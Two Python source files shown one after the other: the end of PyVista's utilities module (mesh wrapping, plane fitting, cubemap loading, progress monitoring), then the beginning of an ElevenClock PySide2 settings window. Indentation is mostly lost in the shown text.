raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
def is_meshio_mesh(obj):
"""Test if passed object is instance of ``meshio.Mesh``.
Parameters
----------
obj
Any object.
Returns
-------
bool
        ``True`` if ``obj`` is a ``meshio.Mesh``.
"""
try:
import meshio
return isinstance(obj, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
* 3D :class:`meshio.Mesh` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
pyvista.DataSet
The PyVista wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object.
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object.
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
# Return if None
if dataset is None:
return
# Check if dataset is a numpy array. We do this first since
# pyvista_ndarray contains a VTK type that we don't want to
# directly wrap.
if isinstance(dataset, (np.ndarray, pyvista.pyvista_ndarray)):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dims=dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
            raise NotImplementedError('NumPy array could not be wrapped by pyvista.')
# wrap VTK arrays as pyvista_ndarray
if isinstance(dataset, _vtk.vtkDataArray):
return pyvista.pyvista_ndarray(dataset)
# Check if a dataset is a VTK type
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
try:
return pyvista._wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return
# wrap meshio
if is_meshio_mesh(dataset):
return from_meshio(dataset)
# wrap trimesh
if dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
    # otherwise, tell the user we can't wrap this object
raise NotImplementedError(f'Unable to wrap ({type(dataset)}) into a pyvista type.')
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``.
Parameters
----------
image : pyvista.UniformGrid or vtkImageData
Image to convert.
Returns
-------
vtkTexture
VTK texture.
"""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture.
Parameters
----------
image : numpy.ndarray
Numpy image array.
Returns
-------
vtkTexture
VTK texture.
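    Examples
    --------
    A minimal sketch building a texture from a random RGB image; the
    array values are illustrative only.
    >>> import numpy as np
    >>> import pyvista
    >>> image = np.random.randint(0, 255, (256, 256, 3), dtype=np.uint8)
    >>> texture = pyvista.numpy_to_texture(image)  # doctest:+SKIP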
"""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
    This is implemented recursively so that it generalizes to N dimensions.
Parameters
----------
point : sequence
Three item cartesian point (i.e. ``[x, y, z]``).
bounds : sequence
Six item bounds in the form of ``(xMin, xMax, yMin, yMax, zMin, zMax)``.
Returns
-------
bool
``True`` when ``point`` is inside ``bounds``.
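    Examples
    --------
    A minimal sketch checking a point against unit-cube bounds; the
    import path is an assumption.
    >>> from pyvista.utilities import is_inside_bounds  # doctest:+SKIP
    >>> is_inside_bounds((0.5, 0.5, 0.5), (0, 1, 0, 1, 0, 1))  # doctest:+SKIP
    True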
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(
point, collections.deque
):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
            raise ValueError('Bounds do not match point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points using the SVD algorithm.
Parameters
----------
points : sequence
Size ``[N x 3]`` sequence of points to fit a plane through.
return_meta : bool, optional
If ``True``, also returns the center and normal used to
generate the plane.
Returns
-------
pyvista.PolyData
Plane mesh.
numpy.ndarray
Plane center if ``return_meta=True``.
numpy.ndarray
Plane normal if ``return_meta=True``.
Examples
--------
Fit a plane to a random point cloud.
>>> import pyvista
>>> import numpy as np
>>> cloud = np.random.random((10, 3))
>>> cloud[:, 2] *= 0.1
>>> plane, center, normal = pyvista.fit_plane_to_points(cloud, return_meta=True)
Plot the fitted plane.
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(plane, color='tan', style='wireframe', line_width=4)
>>> _ = pl.add_points(cloud, render_points_as_spheres=True,
... color='r', point_size=30)
>>> pl.show()
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, dataset):
"""Raise exception about inconsistencies.
Parameters
----------
scalars : numpy.ndarray
Array of scalars.
dataset : pyvista.DataSet
Dataset to check against.
Raises
------
ValueError
        Raises a ValueError if the size of scalars does not match the dataset.
"""
if isinstance(dataset, _vtk.vtkTable):
raise ValueError(
f'Number of scalars ({scalars.size}) must match number of rows ({dataset.n_rows}).'
)
raise ValueError(
f'Number of scalars ({scalars.size}) '
f'must match either the number of points ({dataset.n_points}) '
f'or the number of cells ({dataset.n_cells}).'
)
def generate_plane(normal, origin):
"""Return a _vtk.vtkPlane.
Parameters
----------
normal : sequence
Three item sequence representing the normal of the plane.
origin : sequence
Three item sequence representing the origin of the plane.
Returns
-------
vtk.vtkPlane
VTK plane.
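    Examples
    --------
    A minimal sketch creating a plane through the origin with a normal
    along z; the import path is an assumption.
    >>> from pyvista.utilities import generate_plane  # doctest:+SKIP
    >>> plane = generate_plane((0, 0, 1), (0, 0, 0))  # doctest:+SKIP
    >>> plane.GetNormal()  # doctest:+SKIP
    (0.0, 0.0, 1.0)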
"""
plane = _vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement.
Parameters
----------
func : callable
Callable object.
*args
Any arguments.
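    Examples
    --------
    A minimal sketch: the exception raised inside the callback is logged
    rather than propagated.
    >>> def failing_callback():
    ...     raise RuntimeError("callback failed")
    >>> try_callback(failing_callback)  # doctest:+SKIP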
"""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = 'Encountered issue in callback (most recent call last):\n' + ''.join(
traceback.format_list(stack) + traceback.format_exception_only(etype, exc)
).rstrip('\n')
logging.warning(formatted_exception)
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the
current environment. Returns ``True`` if depth peeling is
available and has been successfully leveraged, otherwise
``False``.
Parameters
----------
number_of_peels : int, optional
Maximum number of depth peels.
occlusion_ratio : float, optional
Occlusion ratio.
Returns
-------
bool
``True`` when system supports depth peeling with the specified
settings.
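    Examples
    --------
    A minimal sketch; the result depends on the local graphics stack,
    and the import path is an assumption.
    >>> from pyvista.utilities import check_depth_peeling  # doctest:+SKIP
    >>> check_depth_peeling()  # doctest:+SKIP
    True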
"""
# Try Depth Peeling with a basic scene
source = _vtk.vtkSphereSource()
mapper = _vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = _vtk.vtkRenderer()
renderWindow = _vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread.
Parameters
----------
fn : callable
Callable object.
Returns
-------
function
Wrapped function.
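    Examples
    --------
    A minimal sketch: the wrapped function runs on a background thread
    and the ``Thread`` object is returned immediately.
    >>> @threaded
    ... def heavy_task(n):
    ...     return sum(range(n))
    >>> thread = heavy_task(10)  # doctest:+SKIP
    >>> thread.join()  # doctest:+SKIP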
"""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class conditional_decorator:
"""Conditional decorator for methods.
Parameters
----------
dec
Decorator
condition
Condition to match.
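    Examples
    --------
    A minimal sketch: the decorator is applied only when the condition
    holds, otherwise the function is returned unchanged.
    >>> import functools
    >>> @conditional_decorator(functools.lru_cache(), condition=False)
    ... def identity(x):
    ...     return x
    >>> identity(3)  # doctest:+SKIP
    3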
"""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
class ProgressMonitor:
"""A standard class for monitoring the progress of a VTK algorithm.
    This must be used in a ``with`` context, and it will block keyboard
    interrupts from happening until the exit event, as interrupts would
    crash the kernel if the VTK algorithm is still executing.
Parameters
----------
algorithm
VTK algorithm or filter.
message : str, optional
Message to display in the progress bar.
scaling : float, optional
Unused keyword argument.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm # noqa
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = _vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(
total=1, leave=True, bar_format='{l_bar}{bar}[{elapsed}<{remaining}]'
)
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
    This prevents a class from being instantiated, similar to
    ``abc.ABCMeta``, but does not require an abstract method.
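    Examples
    --------
    A minimal sketch: the decorated base class cannot be instantiated,
    but its subclasses can.
    >>> @abstract_class
    ... class Base:
    ...     pass
    >>> Base()  # doctest:+SKIP
    Traceback (most recent call last):
    ...
    TypeError: Base is an abstract class and may not be instantiated.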
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points by angle about an axis.
Parameters
----------
points : numpy.ndarray
Array of points with shape ``(N, 3)``.
angle : float
Rotation angle.
inplace : bool, optional
Updates points in-place while returning nothing.
deg : bool, optional
If ``True``, the angle is interpreted as degrees instead of
radians. Default is ``True``.
axis : str, optional
Name of axis to rotate about. Valid options are ``'x'``, ``'y'``,
and ``'z'``. Default value is ``'z'``.
Returns
-------
numpy.ndarray
Rotated points.
Examples
--------
Rotate a set of points by 90 degrees about the x-axis in-place.
>>> import numpy as np
>>> import pyvista
>>> from pyvista import examples
>>> points = examples.load_airplane().points
>>> points_orig = points.copy()
>>> pyvista.axis_rotation(points, 90, axis='x', deg=True, inplace=True)
>>> assert np.all(np.isclose(points[:, 0], points_orig[:, 0]))
>>> assert np.all(np.isclose(points[:, 1], -points_orig[:, 2]))
>>> assert np.all(np.isclose(points[:, 2], points_orig[:, 1]))
"""
axis = axis.lower()
axis_to_vec = {'x': (1, 0, 0), 'y': (0, 1, 0), 'z': (0, 0, 1)}
if axis not in axis_to_vec:
raise ValueError('Invalid axis. Must be either "x", "y", or "z"')
rot_mat = transformations.axis_angle_rotation(axis_to_vec[axis], angle, deg=deg)
return transformations.apply_transformation_to_points(rot_mat, points, inplace=inplace)
def cubemap(path='', prefix='', ext='.jpg'):
"""Construct a cubemap from 6 images from a directory.
Each of the 6 images must be in the following format:
- <prefix>negx<ext>
- <prefix>negy<ext>
- <prefix>negz<ext>
- <prefix>posx<ext>
- <prefix>posy<ext>
- <prefix>posz<ext>
    Prefix may be empty, and the extension will default to ``'.jpg'``.
For example, if you have 6 images with the skybox2 prefix:
- ``'skybox2-negx.jpg'``
- ``'skybox2-negy.jpg'``
- ``'skybox2-negz.jpg'``
- ``'skybox2-posx.jpg'``
- ``'skybox2-posy.jpg'``
- ``'skybox2-posz.jpg'``
Parameters
----------
path : str, optional
Directory containing the cubemap images.
prefix : str, optional
Prefix to the filename.
ext : str, optional
The filename extension. For example ``'.jpg'``.
Returns
-------
pyvista.Texture
Texture with cubemap.
Examples
--------
Load a skybox given a directory, prefix, and file extension.
>>> import pyvista
>>> skybox = pyvista.cubemap('my_directory', 'skybox', '.jpeg') # doctest:+SKIP
"""
sets = ['posx', 'negx', 'posy', 'negy', 'posz', 'negz']
image_paths = [os.path.join(path, f'{prefix}{suffix}{ext}') for suffix in sets]
return _cubemap_from_paths(image_paths)
def cubemap_from_filenames(image_paths):
"""Construct a cubemap from 6 images.
Images must be in the following order:
- Positive X
- Negative X
- Positive Y
- Negative Y
- Positive Z
- Negative Z
Parameters
----------
image_paths : list
Paths of the individual cubemap images.
Returns
-------
pyvista.Texture
Texture with cubemap.
Examples
--------
Load a skybox given a list of image paths.
>>> image_paths = [
... '/home/user/_px.jpg',
... '/home/user/_nx.jpg',
... '/home/user/_py.jpg',
... '/home/user/_ny.jpg',
... '/home/user/_pz.jpg',
... '/home/user/_nz.jpg',
... ]
>>> skybox = pyvista.cubemap(image_paths=image_paths) # doctest:+SKIP
"""
if len(image_paths) != 6:
raise ValueError("image_paths must contain 6 paths")
return _cubemap_from_paths(image_paths)
def _cubemap_from_paths(image_paths):
"""Construct a cubemap from image paths."""
for image_path in image_paths:
if not os.path.isfile(image_path):
file_str = '\n'.join(image_paths)
raise FileNotFoundError(
f'Unable to locate {image_path}\n'
'Expected to find the following files:\n'
f'{file_str}'
)
texture = pyvista.Texture()
texture.SetMipmap(True)
texture.SetInterpolate(True)
texture.cube_map = True # Must be set prior to setting images
# add each image to the cubemap
for i, fn in enumerate(image_paths):
image = pyvista.read(fn)
flip = _vtk.vtkImageFlip()
flip.SetInputDataObject(image)
flip.SetFilteredAxis(1) # flip y axis
flip.Update()
texture.SetInputDataObject(i, flip.GetOutput())
return texture
def set_default_active_vectors(mesh: 'pyvista.DataSet') -> None:
"""Set a default vectors array on mesh, if not already set.
If an active vector already exists, no changes are made.
    If active vectors do not exist, this checks for possible cell
    or point arrays with shape ``(n, 3)``. If only one exists, it
    is set as the active vectors. Otherwise, an error is raised.
Parameters
----------
mesh : pyvista.DataSet
Dataset to set default active vectors.
Raises
------
MissingDataError
If no vector-like arrays exist.
AmbiguousDataError
        If more than one vector-like array exists.
"""
if mesh.active_vectors_name is not None:
return
point_data = mesh.point_data
cell_data = mesh.cell_data
possible_vectors_point = [
name for name, value in point_data.items() if value.ndim == 2 and value.shape[1] == 3
]
possible_vectors_cell = [
name for name, value in cell_data.items() if value.ndim == 2 and value.shape[1] == 3
]
possible_vectors = possible_vectors_point + possible_vectors_cell
n_possible_vectors = len(possible_vectors)
if n_possible_vectors == 1:
if len(possible_vectors_point) == 1:
preference = 'point'
else:
preference = 'cell'
mesh.set_active_vectors(possible_vectors[0], preference=preference)
elif n_possible_vectors < 1:
raise MissingDataError("No vector-like data available.")
elif n_possible_vectors > 1:
raise AmbiguousDataError(
"Multiple vector-like data available\n"
f"cell data: {possible_vectors_cell}.\n"
f"point data: {possible_vectors_point}.\n"
"Set one as active using DataSet.set_active_vectors(name, preference=type)"
)
def set_default_active_scalars(mesh: 'pyvista.DataSet') -> None:
"""Set a default scalars array on mesh, if not already set.
    If active scalars already exist, no changes are made.
    If active scalars do not exist, this checks for point or cell
    arrays. If only one exists, it is set as the active scalars.
Otherwise, an error is raised.
Parameters
----------
mesh : pyvista.DataSet
Dataset to set default active scalars.
Raises
------
MissingDataError
If no arrays exist.
AmbiguousDataError
If more than one array exists.
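    Examples
    --------
    A minimal sketch, assuming this helper is importable from
    ``pyvista.utilities``; a mesh with no arrays raises
    ``MissingDataError``.
    >>> import numpy as np
    >>> import pyvista
    >>> from pyvista.utilities import set_default_active_scalars  # doctest:+SKIP
    >>> mesh = pyvista.PolyData(np.random.random((10, 3)))
    >>> set_default_active_scalars(mesh)  # doctest:+SKIP
    Traceback (most recent call last):
    ...
    MissingDataError: No data available.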
"""
if mesh.active_scalars_name is not None:
return
point_data = mesh.point_data
cell_data = mesh.cell_data
possible_scalars_point = point_data.keys()
possible_scalars_cell = cell_data.keys()
possible_scalars = possible_scalars_point + possible_scalars_cell
n_possible_scalars = len(possible_scalars)
if n_possible_scalars == 1:
if len(possible_scalars_point) == 1:
preference = 'point'
else:
preference = 'cell'
mesh.set_active_scalars(possible_scalars[0], preference=preference)
elif n_possible_scalars < 1:
raise MissingDataError("No data available.")
elif n_possible_scalars > 1:
raise AmbiguousDataError(
"Multiple data available\n"
f"cell data: {possible_scalars_cell}.\n"
f"point data: {possible_scalars_point}.\n"
"Set one as active using DataSet.set_active_scalars(name, preference=type)"
)
|
settings.py
|
import platform
import subprocess
import os
import sys
import locale
import time
from PySide2 import QtGui
import psutil
from PySide2.QtGui import *
from PySide2.QtCore import *
from PySide2.QtWidgets import *
import globals
from languages import *
from tools import *
from tools import _
from FramelessWindow import QFramelessWindow
class SettingsWindow(QFramelessWindow):
def __init__(self):
super().__init__()
self.scrollArea = QScrollArea()
self.vlayout = QVBoxLayout()
self.vlayout.setContentsMargins(0, 0, 0, 0)
self.vlayout.setMargin(0)
self.vlayout.setSpacing(0)
layout = QVBoxLayout()
self.updateSize = True
self.scrollArea.setWidgetResizable(True)
self.setObjectName("backgroundWindow")
self.settingsWidget = QWidget()
self.settingsWidget.setObjectName("background")
self.setWindowIcon(QIcon(getPath("icon.ico")))
layout.addSpacing(10)
title = QLabel(_("ElevenClock Settings"))
title.setObjectName("title")
if lang == lang_zh_TW or lang == lang_zh_CN:
title.setStyleSheet("font-size: 25pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
title.setStyleSheet("font-size: 25pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
layout.addWidget(title)
layout.setSpacing(0)
layout.setContentsMargins(0, 0, 0, 0)
layout.setMargin(2)
layout.addSpacing(10)
self.resize(900, 600)
layout.addSpacing(20)
self.scrollArea.setFrameShape(QFrame.NoFrame)
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
else:
self.iconMode = "black"
self.generalSettingsTitle = QIconLabel(_("General Settings:"), getPath(f"settings_{self.iconMode}.png"))
layout.addWidget(self.generalSettingsTitle)
self.updateButton = QSettingsButton(_("<b>Update to the latest version!</b>"), _("Install update"))
self.updateButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.updateButton.clicked.connect(lambda: KillableThread(target=globals.updateIfPossible, args=((True,))).start())
self.updateButton.hide()
layout.addWidget(self.updateButton)
        self.selectedLanguage = QSettingsComboBox(_("ElevenClock's language")+" (Language)", _("Change")) #The non-translated (Language) string is there to know what the language option is if you accidentally change the language
self.selectedLanguage.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
try:
self.selectedLanguage.setItems(list(languageReference.values()), list(languageReference.keys()).index(langName))
except Exception as e:
report(e)
self.selectedLanguage.setItems(list(languageReference.values()), 0)
def changeLang(text):
keys = list(languageReference.keys())
values = list(languageReference.values())
for i in range(len(values)):
if(text == values[i]):
setSettingsValue("PreferredLanguage", str(keys[i]), r=False)
self.selectedLanguage.showRestartButton()
def restartElevenClockByLangChange():
subprocess.run(str("start /B \"\" \""+sys.executable)+"\" --settings", shell=True)
globals.app.quit()
self.selectedLanguage.restartButton.clicked.connect(restartElevenClockByLangChange)
self.selectedLanguage.textChanged.connect(changeLang)
layout.addWidget(self.selectedLanguage)
self.enableUpdates = QSettingsCheckBox(_("Automatically check for updates"))
self.enableUpdates.setChecked(not getSettings("DisableAutoCheckForUpdates"))
self.enableUpdates.stateChanged.connect(lambda i: setSettings("DisableAutoCheckForUpdates", not bool(i), r = False))
layout.addWidget(self.enableUpdates)
self.installUpdates = QSettingsCheckBox(_("Automatically install available updates"))
self.installUpdates.setChecked(not getSettings("DisableAutoInstallUpdates"))
self.installUpdates.stateChanged.connect(lambda i: setSettings("DisableAutoInstallUpdates", not bool(i), r = False))
layout.addWidget(self.installUpdates)
self.silentUpdates = QSettingsCheckBox(_("Enable really silent updates"))
self.silentUpdates.setChecked(getSettings("EnableSilentUpdates"))
self.silentUpdates.stateChanged.connect(lambda i: setSettings("EnableSilentUpdates", bool(i), r = False))
layout.addWidget(self.silentUpdates)
self.bypassCNAMECheck = QSettingsCheckBox(_("Bypass update provider authenticity check (NOT RECOMMENDED, AT YOUR OWN RISK)"))
self.bypassCNAMECheck.setChecked(getSettings("BypassDomainAuthCheck"))
self.bypassCNAMECheck.stateChanged.connect(lambda i: setSettings("BypassDomainAuthCheck", bool(i), r = False))
layout.addWidget(self.bypassCNAMECheck)
self.enableSystemTray = QSettingsCheckBox(_("Show ElevenClock on system tray"))
self.enableSystemTray.setChecked(not getSettings("DisableSystemTray"))
self.enableSystemTray.stateChanged.connect(lambda i: setSettings("DisableSystemTray", not bool(i)))
layout.addWidget(self.enableSystemTray)
self.startupButton = QSettingsButton(_("Change startup behaviour"), _("Change"))
self.startupButton.clicked.connect(lambda: os.startfile("ms-settings:startupapps"))
layout.addWidget(self.startupButton)
layout.addSpacing(10)
self.clockSettingsTitle = QIconLabel(_("Clock Settings:"), getPath(f"clock_{self.iconMode}.png"))
layout.addWidget(self.clockSettingsTitle)
self.legacyHideOnFullScreen = QSettingsCheckBox(_("Hide the clock in fullscreen mode"))
self.legacyHideOnFullScreen.setChecked(not getSettings("DisableHideOnFullScreen"))
self.legacyHideOnFullScreen.stateChanged.connect(lambda i: setSettings("DisableHideOnFullScreen", not bool(i)))
layout.addWidget(self.legacyHideOnFullScreen)
self.legacyRDPHide = QSettingsCheckBox(_("Hide the clock when RDP Client or Citrix Workspace are running").replace("RDP", "RDP, VMWare Horizon"))
self.legacyRDPHide.setChecked(getSettings("EnableHideOnRDP"))
self.legacyRDPHide.stateChanged.connect(lambda i: setSettings("EnableHideOnRDP", bool(i)))
layout.addWidget(self.legacyRDPHide)
self.forceClockToShow = QSettingsCheckBox(_("Show the clock when the taskbar is set to hide automatically"))
self.forceClockToShow.setChecked(getSettings("DisableHideWithTaskbar"))
self.forceClockToShow.stateChanged.connect(lambda i: setSettings("DisableHideWithTaskbar", bool(i)))
layout.addWidget(self.forceClockToShow)
self.clockAtBottom = QSettingsCheckBox(_("Force the clock to be at the bottom of the screen"))
self.clockAtBottom.setChecked(getSettings("ForceOnBottom"))
self.clockAtBottom.stateChanged.connect(lambda i: setSettings("ForceOnBottom", bool(i)))
layout.addWidget(self.clockAtBottom)
self.clockAtLeft = QSettingsCheckBox(_("Show the clock at the left of the screen"))
self.clockAtLeft.setChecked(getSettings("ClockOnTheLeft"))
self.clockAtLeft.stateChanged.connect(lambda i: setSettings("ClockOnTheLeft", bool(i)))
layout.addWidget(self.clockAtLeft)
self.primaryScreen = QSettingsCheckBox(_("Show the clock on the primary screen (Useful if clock is set on the left)"))
self.primaryScreen.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.primaryScreen.setChecked(getSettings("ForceClockOnFirstMonitor"))
self.primaryScreen.stateChanged.connect(lambda i: setSettings("ForceClockOnFirstMonitor", bool(i)))
layout.addWidget(self.primaryScreen)
layout.addSpacing(10)
self.clockAppearanceTitle = QIconLabel(_("Clock Appearance:"), getPath(f"appearance_{self.iconMode}.png"))
layout.addWidget(self.clockAppearanceTitle)
self.blackText = QSettingsCheckBox(_("Force the clock to have black text"))
self.blackText.setChecked(getSettings("ForceLightTheme"))
self.blackText.stateChanged.connect(lambda i: setSettings("ForceLightTheme", bool(i)))
#layout.addWidget(self.blackText)
self.lightText = QSettingsCheckBox(_("Force the clock to have white text"))
self.lightText.setChecked(getSettings("ForceDarkTheme"))
#layout.addWidget(self.lightText)
self.fontPrefs = QSettingsFontBoxComboBox(_("Use a custom font"))
self.fontPrefs.setChecked(getSettings("UseCustomFont"))
if self.fontPrefs.isChecked():
customFont = getSettingsValue("UseCustomFont")
if customFont:
self.fontPrefs.combobox.setCurrentText(customFont)
self.fontPrefs.combobox.lineEdit().setFont(QFont(customFont))
else:
if lang == lang_ko:
self.fontPrefs.combobox.setCurrentText("Malgun Gothic")
elif lang == lang_zh_TW or lang == lang_zh_CN:
self.fontPrefs.combobox.setCurrentText("Microsoft JhengHei UI")
else:
self.fontPrefs.combobox.setCurrentText("Segoe UI Variable Display")
self.fontPrefs.stateChanged.connect(lambda i: setSettings("UseCustomFont", bool(i)))
self.fontPrefs.valueChanged.connect(lambda v: setSettingsValue("UseCustomFont", v))
layout.addWidget(self.fontPrefs)
self.fontSize = QSettingsSizeBoxComboBox(_("Use a custom font size"))
self.fontSize.setChecked(getSettings("UseCustomFontSize"))
self.fontSize.loadItems()
if self.fontSize.isChecked():
customFontSize = getSettingsValue("UseCustomFontSize")
if customFontSize:
self.fontSize.combobox.setCurrentText(customFontSize)
else:
self.fontSize.combobox.setCurrentText("9")
self.fontSize.stateChanged.connect(lambda i: setSettings("UseCustomFontSize", bool(i)))
self.fontSize.valueChanged.connect(lambda v: setSettingsValue("UseCustomFontSize", v))
layout.addWidget(self.fontSize)
self.fontColor = QSettingsSizeBoxColorDialog(_("Use a custom font color"))
self.fontColor.setChecked(getSettings("UseCustomFontColor"))
if self.fontColor.isChecked():
self.fontColor.button.setStyleSheet(f"color: rgb({getSettingsValue('UseCustomFontColor')})")
self.fontColor.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.fontColor.stateChanged.connect(lambda i: setSettings("UseCustomFontColor", bool(i)))
self.fontColor.valueChanged.connect(lambda v: setSettingsValue("UseCustomFontColor", v))
layout.addWidget(self.fontColor)
#self.centerText = QSettingsCheckBox(_("Align the clock text to the center"))
#self.centerText.setChecked(getSettings("CenterAlignment"))
